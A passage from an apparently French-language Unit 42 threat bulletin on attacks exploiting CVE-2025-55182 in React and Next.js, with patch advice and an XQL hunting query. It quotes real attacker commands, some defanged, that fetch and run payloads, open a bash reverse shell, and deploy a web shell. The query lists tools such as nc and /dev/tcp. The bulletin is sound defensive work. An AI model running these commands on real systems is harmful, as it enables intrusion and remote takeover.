chmod<\/span> et d'autres utilitaires, soit directement, soit via le binaire BusyBox, les attaquants tentant ainsi d'installer des chargeurs (loaders) Mirai et d'autres charges utiles.<\/p>\n<p>Bien que les attaquants aient tent\u00e9 d'installer ces fichiers, leurs t\u00e9l\u00e9chargements malveillants ont \u00e9t\u00e9 bloqu\u00e9s, emp\u00eachant ainsi toute ex\u00e9cution.<\/p>\n<pre class=\"lang:default decode:true\"># Witnessed commands\r\n## BusyBox\r\n\/bin\/sh -c (cd \/dev;busybox wget hxxp:\/\/31.56.27[.]76\/n2\/x86;chmod 777 x86;.\/x86 reactOnMynuts;busybox wget -q hxxp:\/\/193.34.213[.]150\/nuts\/bolts -O-|sh)\r\n\r\n## Meshagent Directory String\r\nwget -O \/tmp\/meshagent --no-check-certificate hxxps:\/\/72.62.67[.]33\/meshagents?id=w%40Exooh1EQmSgfpvXk%24Kctk3F4RFhqP5EYgH2mHXjcZDuo3H61xfEs%24OKLnWsj6D&amp;installflags=0&amp;meshinstall=6\r\n\r\n# Container Command Usage\r\nrunc --root \/var\/run\/docker\/runtime-runc\/moby --log \/run\/containerd\/io.containerd.runtime.v2.task\/moby\/&lt;IMAGE_HASH&gt;\/log.json --log-format json create --bundle \/run\/containerd\/io.containerd.runtime.v2.task\/moby\/&lt;IMAGE_HASH&gt; --pid-file \/run\/containerd\/io.containerd.runtime.v2.task\/moby\/&lt;IMAGE HASH&gt;\/init.pid &lt;IMAGE_HASH&gt;<\/pre>\n<h3><a id=\"post-167644-_s8v112yds4wx\"><\/a><strong>Cobalt Strike<\/strong><\/h3>\n<p>Unit 42 a observ\u00e9 un acteur mena\u00e7ant exploitant un reverse shell bash pour se connecter \u00e0 un<a href=\"https:\/\/www.virustotal.com\/gui\/ip-address\/38.162.112.141\/detection\" target=\"_blank\" rel=\"noopener\"> serveur Cobalt Strike probable<\/a> :<\/p>\n<pre class=\"lang:default decode:true\">bash -c bash -i &gt;&amp; \/dev\/tcp\/38.162.112[.]141\/8899 0&gt;&amp;1<\/pre>\n<p>De plus, Unit 42 a observ\u00e9 une ex\u00e9cution \u00e0 distance d'un script bash nomm\u00e9 <span style=\"font-family: 'courier new', courier, monospace;\">check.sh<\/span> depuis l'adresse <span style=\"font-family: 'courier new', courier, monospace;\">154.89.152[.]240<\/span>. Comme indiqu\u00e9 dans la figure 3, le script est responsable du t\u00e9l\u00e9chargement d'un autre binaire depuis la m\u00eame adresse, nomm\u00e9 a_x64, qui a \u00e9t\u00e9 enregistr\u00e9 sous le nom <span style=\"font-family: 'courier new', courier, monospace;\">rsyslo<\/span>.<\/p>\n<p>La charge utile semble \u00eatre un agent Cobalt Strike cr\u00e9\u00e9 \u00e0 l'aide de CrossC2, un outil d'extension permettant de g\u00e9n\u00e9rer des Beacons Cobalt Strike pour les syst\u00e8mes d'exploitation Linux. La Figure 3 montre le processus dans Cortex XDR.<\/p>\n<figure id=\"attachment_168411\" aria-describedby=\"caption-attachment-168411\" style=\"width: 1000px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-168411 lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-866005-167644-3.png\" alt=\"Arborescence des processus Cortex XDR pour le d\u00e9ploiement de logiciels malveillants. La capture d'\u00e9cran montre deux chemins d'acc\u00e8s \u00e0 des fichiers dans des branches d'ex\u00e9cution distinctes. Le chemin est marqu\u00e9 par des ic\u00f4nes repr\u00e9sentant des symboles d'avertissement, indiquant le d\u00e9roulement de l'attaque.\" width=\"1000\" height=\"410\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-866005-167644-3.png 1555w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-866005-167644-3-786x322.png 786w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-866005-167644-3-768x315.png 768w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/word-image-866005-167644-3-1536x630.png 1536w\" sizes=\"(max-width: 1000px) 100vw, 1000px\" \/><figcaption id=\"caption-attachment-168411\" class=\"wp-caption-text\">Figure 3. Flux d'attaque du d\u00e9ploiement de Cobalt Strike.<\/figcaption><\/figure>\n<p>La Figure 4 montre \u00e0 quoi ressemble l'alerte pour l'activit\u00e9 Cobalt Strike dans Cortex XDR.<\/p>\n<figure id=\"attachment_167837\" aria-describedby=\"caption-attachment-167837\" style=\"width: 464px\" class=\"wp-caption alignnone\"><img  class=\"wp-image-167837 size-full lozad\"  data-src=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/F4.png\" alt=\"Capture d'\u00e9cran de l'alerte Cortex XDR. Certaines informations ont \u00e9t\u00e9 masqu\u00e9es. L'ex\u00e9cution d'un fichier binaire d\u00e9pos\u00e9 est bloqu\u00e9e et l'alerte est class\u00e9e comme malware. \" width=\"464\" height=\"613\" srcset=\"https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/F4.png 464w, https:\/\/unit42.paloaltonetworks.com\/wp-content\/uploads\/2025\/12\/F4-333x440.png 333w\" sizes=\"(max-width: 464px) 100vw, 464px\" \/><figcaption id=\"caption-attachment-167837\" class=\"wp-caption-text\">Figure 4. Alerte Cortex XDR pour l'activit\u00e9 Cobalt Strike.<\/figcaption><\/figure>\n<h3><a id=\"post-167644-_qo4v7xh0qs21\"><\/a><strong>Activit\u00e9 Web shell<\/strong><\/h3>\n<p>Nous avons observ\u00e9 l'installation d'un web shell interactif d\u00e9guis\u00e9 en gestionnaire de fichiers React (<span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.google.com\/search?q=https:\/\/fm.js\/\" target=\"_blank\" rel=\"noopener\">fm.js<\/a><\/span>), r\u00e9cup\u00e9r\u00e9 directement depuis<a href=\"https:\/\/raw.githubusercontent.com\/laolierzi-commits\/phpbd\/refs\/heads\/main\/rjs\/filemanager-standalone.js\" target=\"_blank\" rel=\"noopener\"> GitHub<\/a>. Il permet de parcourir les r\u00e9pertoires pour r\u00e9colter des fichiers de configuration sensibles, tels que des mots de passe de base de donn\u00e9es et des cl\u00e9s API, tout en facilitant l'exfiltration de donn\u00e9es gr\u00e2ce \u00e0 une fonction de t\u00e9l\u00e9chargement int\u00e9gr\u00e9e pour voler du code source ou des donn\u00e9es clients.<\/p>\n<p>L'outil permet une compromission persistante en autorisant le t\u00e9l\u00e9chargement (upload) de backdoors ou de rootkits suppl\u00e9mentaires, et accorde la capacit\u00e9 d'infliger des dommages irr\u00e9versibles par la suppression massive de fichiers et l'ex\u00e9cution directe de commandes syst\u00e8me.<\/p>\n<p>L'acteur a initi\u00e9 la s\u00e9quence en terminant pr\u00e9ventivement les processus node existants pour \u00e9liminer les conflits de port, suivi d'une validation d'ex\u00e9cution pour confirmer l'ex\u00e9cution de code arbitraire. Le script place (stage) une charge utile web shell Node.js dans le r\u00e9pertoire <span style=\"font-family: 'courier new', courier, monospace;\">\/tmp<\/span>. Il utilise une adaptation r\u00e9seau heuristique en modifiant it\u00e9rativement la configuration pour faire d\u00e9filer diff\u00e9rents ports d'\u00e9coute, tentant ainsi de contourner les politiques de pare-feu locales.<\/p>\n<p>L'attaque se conclut par l'\u00e9tablissement d'une persistance \u00e9ph\u00e9m\u00e8re via <span style=\"font-family: 'courier new', courier, monospace;\">nohup<\/span> et le d\u00e9ploiement d'artefacts de v\u00e9rification uniques (<span style=\"font-family: 'courier new', courier, monospace;\">segawon.txt<\/span>) dans des r\u00e9pertoires web communs, permettant la validation externe de la compromission et la cartographie de la structure de fichiers du serveur.<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c cd \/tmp &amp;&amp; nohup node fm.js &gt; \/dev\/null 2&gt;&amp;1 &amp; sleep 2,\/bin\/sh -c cd \/tmp &amp;&amp; sed -i 's\/const PORT = [0-9]*\/const PORT = 13373\/' fm.js 2&gt;&amp;1,\/bin\/sh -c cd \/tmp &amp;&amp; sed -i 's\/const PORT = [0-9]*\/const PORT = 3000\/' fm.js 2&gt;&amp;1,\/bin\/sh -c cd \/tmp &amp;&amp; sed -i 's\/const PORT = [0-9]*\/const PORT = 8080\/' fm.js 2&gt;&amp;1,\/bin\/sh -c cd \/tmp &amp;&amp; sed -i 's\/const PORT = [0-9]*\/const PORT = 8888\/' fm.js 2&gt;&amp;1,\/bin\/sh -c cd \/tmp &amp;&amp; sed -i 's\/const PORT = [0-9]*\/const PORT = 9000\/' fm.js 2&gt;&amp;1,\/bin\/sh -c cd \/tmp &amp;&amp; wget -q -O fm.js https:\/\/raw.githubusercontent.com\/laolierzi-commits\/phpbd\/refs\/heads\/main\/rjs\/filemanager-standalone.js 2&gt;&amp;1 &amp;&amp; wc -c fm.js,\/bin\/sh -c echo $((41*271)),\/bin\/sh -c echo 'segawon.id' &gt; \/app\/public\/segawon.txt &amp;&amp; chmod 644 \/app\/public\/segawon.txt,\/bin\/sh -c echo 'segawon.id' &gt; \/app\/web\/public\/segawon.txt &amp;&amp; chmod 644 \/app\/web\/public\/segawon.txt,\/bin\/sh -c echo 'segawon.id' &gt; \/var\/www\/html\/segawon.txt &amp;&amp; chmod 644 \/var\/www\/html\/segawon.txt,\/bin\/sh -c id,\/bin\/sh -c killall -9 node 2&gt;\/dev\/null,\/bin\/sh -c ls -la<\/pre>\n<h3><a id=\"post-167644-_nsrcir2nstje\"><\/a><span style=\"font-weight: 400;\">EtherRAT<\/span><\/h3>\n<p>Unit 42 a observ\u00e9 une activit\u00e9 compatible avec EtherRAT, qui effectue les op\u00e9rations suivantes :<\/p>\n<ul>\n<li>Utilisation des contrats intelligents Ethereum pour la r\u00e9solution C2<\/li>\n<li>Utilisation de plusieurs m\u00e9canismes de persistance Linux ind\u00e9pendants<\/li>\n<li>T\u00e9l\u00e9chargement de son propre runtime <a href=\"https:\/\/nodejs.org\" target=\"_blank\" rel=\"noopener\">Node.js<\/a> \u00e0 partir de nodejs.org<\/li>\n<\/ul>\n<p>L\u2019agent de menace UNC5342 de la RPDC<a href=\"https:\/\/cloud.google.com\/blog\/topics\/threat-intelligence\/dprk-adopts-etherhiding\" target=\"_blank\" rel=\"noopener\"> utiliserait EtherHiding<\/a> pour distribuer des malwares et faciliter le vol de cryptomonnaies.<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c echo while :; do (curl -sL http:\/\/193.24.123[.]68:3001\/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh -o .\/s.sh 2&gt;\/dev\/null || wget -qO .\/s.sh http:\/\/193.24.123[.]68:3001\/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh 2&gt;\/dev\/null || python3 -c \"import urllib.request as u;open('.\/s.sh','wb').write(u.urlopen('http:\/\/193.24.123[.]68:3001\/gfdsgsdfhfsd_ghsfdgsfdgsdfg.sh').read())\") &amp;&amp; [ -s .\/s.sh ] &amp;&amp; chmod +x .\/s.sh &amp;&amp; .\/s.sh &amp;&amp; break; sleep 300; done<\/pre>\n<h3><a id=\"post-167619-_ci82r0treebg\"><\/a>Noodle RAT<\/h3>\n<p>Unit 42 a observ\u00e9 le d\u00e9ploiement de <a href=\"https:\/\/www.virustotal.com\/gui\/file\/33641bfbbdd5a9cd2320c61f65fe446a2226d8a48e3bd3c29e8f916f0592575f\" target=\"_blank\" rel=\"noopener\">Noodle RAT<\/a>, une backdoor confirm\u00e9e comme existant en versions Windows et Linux et soup\u00e7onn\u00e9e d'\u00eatre utilis\u00e9e par des groupes sinophones engag\u00e9s dans l'espionnage ou la cybercriminalit\u00e9.<\/p>\n<pre class=\"lang:default decode:true\">hxxp:\/\/146.88.129[.]138:5511\/443nb64\r\n\r\ntcp:\/\/vip[.]kof97.lol:443\r\n\r\n192.238.202[.]17<\/pre>\n<h3><a id=\"post-167644-_f4ku1hupjpfy\"><\/a><strong>Auto-color<\/strong><\/h3>\n<p>Unit 42 a observ\u00e9 plusieurs instances d'une backdoor<a href=\"https:\/\/unit42.paloaltonetworks.com\/new-linux-backdoor-auto-color\/\" target=\"_blank\" rel=\"noopener\"> Auto-color<\/a> jamais vue auparavant dans de multiples environnements, un malware que nous avions initialement publi\u00e9 en f\u00e9vrier 2025. Le nom de fichier associ\u00e9 \u00e0 cette backdoor, <span style=\"font-family: 'courier new', courier, monospace;\">pamssod<\/span>, se fait passer pour la biblioth\u00e8que l\u00e9gitime Pluggable Authentication Module (PAM).<\/p>\n<p>L'auto-coloration a \u00e9t\u00e9 observ\u00e9e aux moments et endroits suivants :<\/p>\n<ul>\n<li>D\u00e9but 2025, ciblant des universit\u00e9s et des organisations gouvernementales asiatiques et nord-am\u00e9ricaines.<\/li>\n<li>Avril 2025, sur le r\u00e9seau d'une entreprise chimique bas\u00e9e aux \u00c9tats-Unis.<\/li>\n<li>Ao\u00fbt 2025, dans le cadre de l'exploitation de CVE-2025-31324.<\/li>\n<\/ul>\n<h3><a id=\"post-167644-_nmz30rei4dr\"><\/a><strong>Activit\u00e9 CL-STA-1015<\/strong><\/h3>\n<p><span style=\"font-weight: 400;\">Unit 42 a observ\u00e9 une activit\u00e9 de menace post-exploitation que nous estimons, avec un degr\u00e9 de confiance \u00e9lev\u00e9, correspondre \u00e0 un cluster d'activit\u00e9 que nous suivons sous le nom de CL-STA-1015. Selon le Google TAG, cet acteur de menace est consid\u00e9r\u00e9, avec un degr\u00e9 de confiance moyen, comme \u00e9tant un courtier en acc\u00e8s initial (<\/span><i><span style=\"font-weight: 400;\">Initial Access Broker<\/span><\/i><span style=\"font-weight: 400;\">) parrain\u00e9 par l'\u00c9tat chinois.<\/span><\/p>\n<p>Les attaquants ont ex\u00e9cut\u00e9 une commande pour r\u00e9cup\u00e9rer et ex\u00e9cuter imm\u00e9diatement une charge utile de script shell malveillant nomm\u00e9 <span style=\"font-family: 'courier new', courier, monospace;\">slt<\/span> depuis un serveur C2 distant. De mani\u00e8re coh\u00e9rente avec l'activit\u00e9 vue pr\u00e9c\u00e9demment, les attaquants ont utilis\u00e9 une logique de s\u00e9curit\u00e9 (fail-safe) utilisant l'op\u00e9rateur <span style=\"font-family: 'courier new', courier, monospace;\">OR<\/span> :<\/p>\n<ul>\n<li>Le syst\u00e8me tente d'abord le t\u00e9l\u00e9chargement en utilisant <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> avec des options optimis\u00e9es pour la furtivit\u00e9 (<span style=\"font-family: 'courier new', courier, monospace;\">-fsSL<\/span> pour supprimer la sortie et suivre les redirections) et la r\u00e9silience (<span style=\"font-family: 'courier new', courier, monospace;\">-m180<\/span> pour \u00e9viter les blocages).<\/li>\n<li>Si <span style=\"font-family: 'courier new', courier, monospace;\">curl<\/span> est indisponible ou \u00e9choue, il se rabat automatiquement sur <span style=\"font-family: 'courier new', courier, monospace;\">wget<\/span> avec des param\u00e8tres similaires de silence et de d\u00e9lai d'attente.<\/li>\n<li>La commande se termine en redirigeant (piping) le contenu t\u00e9l\u00e9charg\u00e9 directement dans <span style=\"font-family: 'courier new', courier, monospace;\">sh<\/span>, permettant une ex\u00e9cution sans fichier o\u00f9 le script malveillant s'ex\u00e9cute imm\u00e9diatement en m\u00e9moire sans n\u00e9cessairement \u00e9crire un fichier persistant sur le disque.<\/li>\n<\/ul>\n<p>La commande neutralis\u00e9e pour ceci est :<\/p>\n<pre class=\"lang:default decode:true\">\/bin\/sh -c (curl -fsSL -m180 hxxp[:]\/\/115.42.60[.]223:61236\/slt||wget -T180 -q hsxp[:]\/\/115.42.60[.]223:61236\/slt)|sh<\/pre>\n<p>Suite \u00e0 la commande ci-dessus, nous avons observ\u00e9 la cr\u00e9ation r\u00e9ussie de deux fichiers malveillants sur le syst\u00e8me de fichiers, coh\u00e9rents avec SNOWLIGHT, et d\u00e9termin\u00e9 par analyse que l'\u00e9chantillon VShell ci-dessous r\u00e9sidait \u00e9galement sur le m\u00eame serveur :<\/p>\n<ul>\n<li>Script bash SNOWLIGHT :<span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.google.com\/search?q=https:\/\/www.virustotal.com\/gui\/file\/a455731133c00fdd2a141bdfba4def34ae58195126f762cdf951056b0ef161d4\" target=\"_blank\" rel=\"noopener\"> a455731133c00fdd2a141bdfba4def34ae58195126f762cdf951056b0ef161d4<\/a><\/span><\/li>\n<li>SNOWLIGHT : <span style=\"font-weight: 400; font-family: 'courier new', courier, monospace;\">2b0dc27f035ba1417990a21dafb361e083e4ed94a75a1c49dc45690ecf463de4a<\/span><\/li>\n<li>VShell :<span style=\"font-family: 'courier new', courier, monospace;\"><a href=\"https:\/\/www.google.com\/search?q=https:\/\/www.virustotal.com\/gui\/file\/4745703f395282a0687def2c7dcf82ed1683f3128bef1686bd74c966273ce1c5\" target=\"_blank\" rel=\"noopener\"> 4745703f395282a0687def2c7dcf82ed1683f3128bef1686bd74c966273ce1c5<\/a><\/span><\/li>\n<\/ul>\n<p>SNOWLIGHT est un dropper de malware furtif observ\u00e9 dans l'activit\u00e9 de CL-STA-1015. Sa fonction principale est d'infiltrer un syst\u00e8me Linux compromis, puis de t\u00e9l\u00e9charger et d'ex\u00e9cuter des malwares suppl\u00e9mentaires plus puissants. Plus particuli\u00e8rement, il t\u00e9l\u00e9charge le RAT VShell. VShell est<a href=\"https:\/\/www.sysdig.com\/blog\/unc5174-chinese-threat-actor-vshell\" target=\"_blank\" rel=\"noopener\"> populaire parmi les cybercriminels sinophones<\/a> sur plusieurs forums, et son d\u00e9veloppeur principal est \u00e9galement sinophone.<\/p>\n<h3>KSwapDoor<\/h3>\n<p><span style=\"font-weight: 400;\">Apr\u00e8s une analyse plus approfondie, Unit 42 a d\u00e9couvert que ce que nous avions pr\u00e9c\u00e9demment identifi\u00e9 comme BPFDoor est en r\u00e9alit\u00e9 une porte d\u00e9rob\u00e9e Linux in\u00e9dite ciblant les serveurs, que nous nommons KSwapDoor. KSwapDoor impl\u00e9mente un r\u00e9seau maill\u00e9 P2P sophistiqu\u00e9 permettant un routage multi-sauts entre les n\u0153uds infect\u00e9s, utilise le chiffrement AES-256-CFB avec \u00e9change de cl\u00e9s Diffie-Hellman pour les communications C2, et inclut un code de renifleur de paquets passif dormant pour contourner potentiellement les pare-feu. Elle offre des capacit\u00e9s compl\u00e8tes d'acc\u00e8s \u00e0 distance, incluant un shell interactif, l'ex\u00e9cution de commandes, des op\u00e9rations sur les fichiers et le scan pour les d\u00e9placements lat\u00e9raux.<\/span><\/p>\n<p><b>Principales d\u00e9couvertes :<\/b><\/p>\n<ul>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Furtivit\u00e9 et Dissimulation :<\/b><span style=\"font-weight: 400;\"> D\u00e8s son ex\u00e9cution, le binaire se renomme en <\/span><span style=\"font-weight: 400;\">[kswapd1]<\/span><span style=\"font-weight: 400;\">, imitant un d\u00e9mon de swap l\u00e9gitime du noyau Linux. Il s'ex\u00e9cute totalement en d\u00e9mon via un double fork, cr\u00e9ant une nouvelle session (<\/span><span style=\"font-weight: 400;\">setsid()<\/span><span style=\"font-weight: 400;\">) et redirigeant toutes les entr\u00e9es\/sorties standard vers <\/span><span style=\"font-weight: 400;\">\/dev\/null<\/span><span style=\"font-weight: 400;\">.<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Obfuscation :<\/b><span style=\"font-weight: 400;\"> Presque toutes les cha\u00eenes de caract\u00e8res critiques et les donn\u00e9es de configuration sont prot\u00e9g\u00e9es par chiffrement RC4. Le logiciel malveillant d\u00e9chiffre ces cha\u00eenes \u00e0 l'ex\u00e9cution \u00e0 l'aide de fonctions de planification de cl\u00e9s (<\/span><i><span style=\"font-weight: 400;\">key scheduling<\/span><\/i><span style=\"font-weight: 400;\">) (<\/span><span style=\"font-weight: 400;\">sub_410A41<\/span><span style=\"font-weight: 400;\"> et <\/span><span style=\"font-weight: 400;\">sub_410B8D<\/span><span style=\"font-weight: 400;\">).<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>Persistance et Configuration :<\/b><span style=\"font-weight: 400;\"> Il stocke sa configuration dans un fichier chiffr\u00e9 en RC4 au sein du r\u00e9pertoire personnel de l'utilisateur. Lors de l'initialisation, il lit et d\u00e9chiffre ce fichier pour localiser les cibles de Commande et Contr\u00f4le (C2).<\/span><\/li>\n<li style=\"font-weight: 400;\" aria-level=\"1\"><b>R\u00e9silience :<\/b><span style=\"font-weight: 400;\"> Le logiciel malveillant cr\u00e9e une boucle de surveillance (<\/span><i><span style=\"font-weight: 400;\">watchdog<\/span><\/i><span style=\"font-weight: 400;\">) qui g\u00e9n\u00e8re et surveille les processus enfants, les red\u00e9marrant automatiquement en cas de plantage. Il utilise \u00e9galement un r\u00e9pertoire temporaire (<\/span><i><span style=\"font-weight: 400;\">staging<\/span><\/i><span style=\"font-weight: 400;\">) situ\u00e9 \u00e0 <\/span><span style=\"font-weight: 400;\">\/tmp\/appInsight<\/span><span style=\"font-weight: 400;\">.<\/span><\/li>\n<\/ul>\n<h2><a id=\"post-167644-_effz5kw1r1ua\"><\/a>Conseils provisoires<\/h2>\n<p><strong>Actions requises :<\/strong> L'application imm\u00e9diate de correctifs est la seule mesure d'att\u00e9nuation d\u00e9finitive.<\/p>\n<p>Les \u00e9quipes d'ing\u00e9nierie et de s\u00e9curit\u00e9 doivent imm\u00e9diatement mettre \u00e0 jour vers les versions durcies suivantes :<\/p>\n<ul>\n<li><strong>React :<\/strong> Mettre \u00e0 jour vers 19.0.1, 19.1.2 ou 19.2.1<\/li>\n<li><strong>Next.js :<\/strong> Mettre \u00e0 jour vers les derni\u00e8res versions stables corrig\u00e9es, incluant 16.0.7, 15.5.7, 15.4.8, 15.3.6, 15.2.6, 15.1.9 ou 15.0.5<\/li>\n<\/ul>\n<p>Pour les derni\u00e8res mises \u00e0 jour sur cette vuln\u00e9rabilit\u00e9, veuillez consulter la documentation fournie par l'\u00e9diteur :<\/p>\n<ul>\n<li><a href=\"https:\/\/react.dev\/blog\/2025\/12\/03\/critical-security-vulnerability-in-react-server-components\" target=\"_blank\" rel=\"noopener\">CVE-2025-55182<\/a><\/li>\n<\/ul>\n<h2><a id=\"post-167644-_ejk1imvzphl\"><\/a>Requ\u00eates de Threat Hunting g\u00e9r\u00e9es par Unit 42<\/h2>\n<p>L'\u00e9quipe Unit 42 Managed Threat Hunting continue de suivre toute tentative d'exploitation de cette CVE chez nos clients, en utilisant Cortex XDR et les requ\u00eates XQL ci-dessous. Les clients Cortex XDR peuvent \u00e9galement utiliser ces requ\u00eates XQL pour rechercher des signes d'exploitation.<\/p>\n<p>La requ\u00eate XQL suivante a \u00e9t\u00e9 utilis\u00e9e pour identifier avec succ\u00e8s une activit\u00e9 post-compromission. Lors de l'analyse, un faible nombre de faux positifs a \u00e9t\u00e9 identifi\u00e9. Nous recommandons d'examiner les processus enfants engendr\u00e9s (spawned) par le processus node. Recherchez des op\u00e9rations suspectes sur les fichiers, des op\u00e9rations r\u00e9seau, des commandes de reconnaissance ou d'ex\u00e9cution de code, telles que les commandes observ\u00e9es ci-dessus.<\/p>\n<pre class=\"lang:default decode:true\">\/\/ Description: This query attempts to identify possible node processes spawning two or more post-exploitation lolbins.\r\n\r\n\/\/ Notes: This has the potential to capture false-positives, it is recommended to investigate the children processes spawned by the node process and check for suspicious file operations, network operations, reconnaissance commands or code execution.\r\n\r\nconfig case_sensitive = false\r\n\r\n| preset=xdr_process\r\n\r\n| filter (actor_process_image_name in (\"node\",\"node.exe\", \"bun\", \"bun.exe\") and actor_process_command_line in (\"*react-dom*\", \"*.next*\", \"*node_modules\/next*\", \"*react-server*\", \"*next-server*\", \"*node server.js*\", \"*bin\/next*\", \"*--experimental-https*\", \"*app\/server*\", \"*.pnpm\/next*\", \"*next start*\", \"*next dev*\", \"*react-scripts start*\", \"*next\/dist\/server*\")) or (causality_actor_process_image_name in (\"node\",\"node.exe\", \"bun\", \"bun.exe\") and causality_actor_process_command_line in (\"*react-dom*\", \"*.next*\", \"*node_modules\/next*\", \"*react-server*\", \"*next-server*\", \"*node server.js*\", \"*bin\/next*\", \"*--experimental-https*\", \"*app\/server*\", \"*.pnpm\/next*\", \"*next start*\", \"*next dev*\", \"*react-scripts start*\", \"*next\/dist\/server*\"))\r\n\r\n| filter actor_process_command_line not in (\"*homebrew*\", \"*git config*\", \"*\/users*\", \"*\/usr*\", \"*\\users*\", \"*gcloud config*\", \"*git branch*\", \"*git describe*\") and action_process_image_command_line not in (\"*homebrew*\", \"*git config*\", \"*\/users*\", \"*\/usr*\", \"*\\users*\", \"*gcloud config*\", \"*git branch*\", \"*git describe*\") and causality_actor_process_command_line not in (\"*Microsoft VS Code*\", \"*iTerm2*\", \"*Visual Studio Code*\") and action_process_image_name not in (\"node\", \"node.exe\")\r\n\r\n| alter suspicious_processes = arraycreate(\"id\", \"curl\", \"wget\", \"whoami\", \"arp\", \"at.exe\", \"hostname\", \"nbstat.exe\", \"netsh.exe\", \"netstat.exe\", \"nslookup\", \"ping.exe\", \"query.exe\", \"systeminfo.exe\", \"tasklist.exe\", \"traceroute.exe\", \"ipconfig.exe\", \"whoami.exe\", \"whois.exe\", \"quser.exe\", \"mshta.exe\", \"jscript.exe\", \"cscript.exe\", \"wscript.exe\", \"qwinsta.exe\", \"nltest.exe\", \"csvde.exe\", \"wevtutil.exe\", \"driverquery.exe\", \"nbtscan.exe\", \"ntdsutil.exe\", \"vssadmin.exe\", \"dsquery.exe\", \"adfind.exe\", \"klist.exe\", \"vssvc.exe\", \"nc\", \"ncat\", \"netcat\", \"base64\", \"uname\", \"dmidecode\", \"ip addr\", \"chmod -x\", \"chmod 7\", \"socat\", \"nohup\", \"setsid\", \"powershell.exe\", \"cmd.exe\", \"bash\", \"sh\", \"zsh\", \"mkfifo\", \"rundll32.exe\", \"java\", \"python\", \"python.exe\", \"php\", \"ifconfig\", \"net.exe\", \"net1.exe\", \"\/dev\/udp\", \"\/dev\/tcp\", \"adduser\", \"useradd\", \"lua\", \"crontab\", \"mknod\")\r\n\r\n| alter matches = arrayfilter(suspicious_processes , action_process_image_command_line contains \"@element\")\r\n\r\n| comp count_distinct(action_process_image_command_line) as num_procs, values(action_process_image_command_line) as action_process_image_command_line, values(causality_actor_process_command_line) as causality_actor_process_command_line by agent_hostname, actor_process_image_name, actor_process_command_line, action_process_image_name\r\n\r\n| filter num_procs &gt; 1<\/pre>\n<h2><a id=\"post-167644-_cr98ssyougo0\"><\/a>Conclusion<\/h2>\n<p>L'exploitation imm\u00e9diate et massive de cette vuln\u00e9rabilit\u00e9 met en \u00e9vidence la rapidit\u00e9 avec laquelle les agents de menace agissent pour saisir les opportunit\u00e9s. Bien que nous ayons not\u00e9 une activit\u00e9 li\u00e9e \u00e0 la Chine, l'empreinte de l'activit\u00e9 englobe \u00e9galement une part importante de motivations cybercriminelles.<\/p>\n<p>Il est particuli\u00e8rement notable que CL-STA-1015 (alias UNC5174) a un historique d'exploitation rapide des vuln\u00e9rabilit\u00e9s N-day :<\/p>\n<ul>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2024-1709\" target=\"_blank\" rel=\"noopener\">CVE-2024-1709<\/a><\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2023-46747\" target=\"_blank\" rel=\"noopener\">CVE-2023-46747<\/a><\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2023-22518\" target=\"_blank\" rel=\"noopener\">CVE-2023-22518<\/a><\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/cve-2022-0185\" target=\"_blank\" rel=\"noopener\">CVE-2022-0185<\/a><\/li>\n<li><a href=\"https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2022-30525\" target=\"_blank\" rel=\"noopener\">CVE-2022-30525<\/a><\/li>\n<\/ul>\n<p>La distinction critique de cette vuln\u00e9rabilit\u00e9 est sa nature de faille logique d\u00e9terministe dans le protocole Flight, plut\u00f4t qu'une erreur probabiliste. Contrairement aux bugs de corruption de m\u00e9moire qui peuvent \u00e9chouer, cette faille garantit l'ex\u00e9cution, la transformant en un moyen de contournement fiable \u00e0 l'\u00e9chelle du syst\u00e8me pour les attaquants. Amplifi\u00e9e par l'empreinte massive de Next.js dans les environnements d'entreprise, elle cr\u00e9e un conduit direct vers les donn\u00e9es internes sensibles.<\/p>\n<p>En fin de compte, cet incident souligne la friction inh\u00e9rente entre performance et s\u00e9curit\u00e9 dans l'architecture moderne. Bien que les React Server Components optimisent la r\u00e9cup\u00e9ration de donn\u00e9es et le r\u00e9f\u00e9rencement (SEO) en rapprochant la logique de la source, ils rapprochent simultan\u00e9ment la surface d'attaque des donn\u00e9es les plus sensibles et pr\u00e9cieuses des organisations.<\/p>\n<p>Les clients de Palo Alto Networks sont mieux prot\u00e9g\u00e9s par nos produits, comme indiqu\u00e9 ci-dessous. Nous mettrons \u00e0 jour ce bulletin de menace \u00e0 mesure que des informations plus pertinentes seront disponibles.<\/p>\n<h2><a id=\"post-167644-_x9rbpi91mxsp\"><\/a>Protections des produits Palo Alto Networks pour la CVE-2025-55182<\/h2>\n<p>Les clients de Palo Alto Networks peuvent tirer parti d'une vari\u00e9t\u00e9 de protections produits et de mises \u00e0 jour pour identifier et se d\u00e9fendre contre cette menace.<\/p>\n<p>Si vous pensez avoir \u00e9t\u00e9 compromis ou si vous avez une urgence, contactez l'<a href=\"https:\/\/start.paloaltonetworks.com\/contact-unit42.html\" target=\"_blank\" rel=\"noopener\">\u00e9quipe de r\u00e9ponse aux incidents de Unit 42<\/a> ou appelez :<\/p>\n<ul>\n<li>Am\u00e9rique du Nord (num\u00e9ro gratuit) : +1 